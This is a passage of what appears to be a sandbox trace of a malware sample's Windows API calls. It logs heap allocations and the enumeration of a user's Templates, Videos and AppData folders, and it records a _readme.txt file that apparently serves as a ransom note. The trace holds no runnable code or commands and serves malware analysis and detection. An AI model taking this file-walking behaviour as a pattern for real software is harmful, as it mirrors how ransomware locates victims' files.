(HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0188.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.811] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0188.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.811] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0188.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.812] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9873ac90, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9873ac90, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0188.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddf78 [0188.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0188.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0188.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddf78 | out: hHeap=0x620000) returned 1 [0188.815] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda323040, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0188.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x46) returned 0x2ccbaa8 [0188.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.816] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned=".txt" [0188.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccbaa8 | out: hHeap=0x620000) returned 1 [0188.816] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda323040, ftCreationTime.dwHighDateTime=0x1d8a8b9, ftLastAccessTime.dwLowDateTime=0xda323040, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xda323040, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0188.816] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0188.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0188.817] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0188.817] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0188.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0188.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0188.820] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837f0 | out: hHeap=0x620000) returned 1 [0188.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f70 | out: hHeap=0x620000) returned 1 [0188.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a48 | out: hHeap=0x620000) returned 1 [0188.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83bb0 | out: hHeap=0x620000) returned 1 [0188.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a20 | out: hHeap=0x620000) returned 1 [0188.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83908 | out: hHeap=0x620000) returned 1 [0188.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839d0 | out: hHeap=0x620000) returned 1 [0188.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83840 | out: hHeap=0x620000) returned 1 [0188.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83778 | out: hHeap=0x620000) returned 1 [0188.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83818 | out: hHeap=0x620000) returned 1 [0188.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83868 | out: hHeap=0x620000) returned 1 [0188.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83c28 | out: hHeap=0x620000) returned 1 [0188.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83bd8 | out: hHeap=0x620000) returned 1 [0188.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cc8 | out: hHeap=0x620000) returned 1 [0188.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0188.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838e0 | out: hHeap=0x620000) returned 1 [0188.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83d18 | out: hHeap=0x620000) returned 1 [0188.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e839f8 | out: hHeap=0x620000) returned 1 [0188.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83930 | out: hHeap=0x620000) returned 1 [0188.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83980 | out: hHeap=0x620000) returned 1 [0188.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83ae8 | out: hHeap=0x620000) returned 1 [0188.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b10 | out: hHeap=0x620000) returned 1 [0188.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b38 | out: hHeap=0x620000) returned 1 [0188.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0188.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ab8 | out: hHeap=0x620000) returned 1 [0188.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95af0 | out: hHeap=0x620000) returned 1 [0188.828] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.828] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0188.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0188.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0188.828] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0188.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b38 [0188.828] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0188.828] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.828] PathFindFileNameW (pszPath="") returned="" [0188.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.828] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.829] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.829] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xd866c6e0, ftLastAccessTime.dwHighDateTime=0x1d8a8b9, ftLastWriteTime.dwLowDateTime=0xd866c6e0, ftLastWriteTime.dwHighDateTime=0x1d8a8b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccae48 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b38 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0188.829] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccae48 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x2cfe140 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0188.829] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98c239f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98c239f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccae48 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x54) returned 0x2c3a5b0 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0188.829] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98c239f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98c239f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0188.829] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0188.829] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0188.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccae48 [0188.830] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0188.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0188.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0188.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.837] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.838] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0188.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0188.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0188.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0188.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0188.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 